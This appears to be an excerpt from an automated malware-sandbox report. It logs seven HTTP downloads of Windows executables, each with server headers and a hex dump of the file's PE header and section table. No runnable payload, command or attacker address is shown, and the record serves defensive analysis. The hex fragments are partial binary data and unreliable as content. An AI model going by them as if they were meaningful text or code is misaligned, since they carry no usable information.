Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:15 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 07:43:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:20 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:21 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:22 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:25 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:27 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
